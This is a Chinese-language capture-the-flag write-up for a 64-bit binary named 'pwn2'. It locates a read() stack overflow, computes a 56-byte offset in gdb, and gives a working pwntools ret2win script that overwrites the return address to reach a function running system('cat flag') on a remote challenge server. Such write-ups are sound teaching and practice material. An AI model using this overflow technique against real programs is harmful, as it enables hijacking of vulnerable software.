下载完题后先在VM中checksec
查看保护机制
基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数
可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。
在main函数下面有一个get_shell_()函数,打开看一下
有一个system(“cat flag”),cat flag是得到flag的指令,所以只要执行了get_shell_()函数,就能得到flag。利用栈溢出,控制跳转,跳转到get_shell_()函数的地址执行get_shell_()函数,即利用read()函数将get_shell_()函数的地址写在s处,执行get_shell_()函数.
使用gdb调试程序,查看栈的情况
在read函数那下个断点,然后跟进去,由于这是个64位的程序,所以read函数的三个参数依次保存在rdi、rsi、rdx、rcx、r8、r9中。所以rdi为0,rsi为buffer的地址,rdx为0x100.
RBP—RSI为缓冲区大小(0x30),将0x30转为十进制
所以偏移地址为RBP-RSI+8=48+8=56,加8是因为64位程序下的rbp占8个字节所以加8
找到get_shell_()函数地址为
脚本如下:
from pwn import *
context.log_level = 'debug'
# conn = process('./pwn2')
conn = remote('114.116.54.89',10003)
shell_addr = 0x0000000000400751
conn.recvuntil('say something?')
payload = 'A' * 56 + p64(shell_addr)
conn.sendline(payload)
conn.interactive()
执行脚本得到flag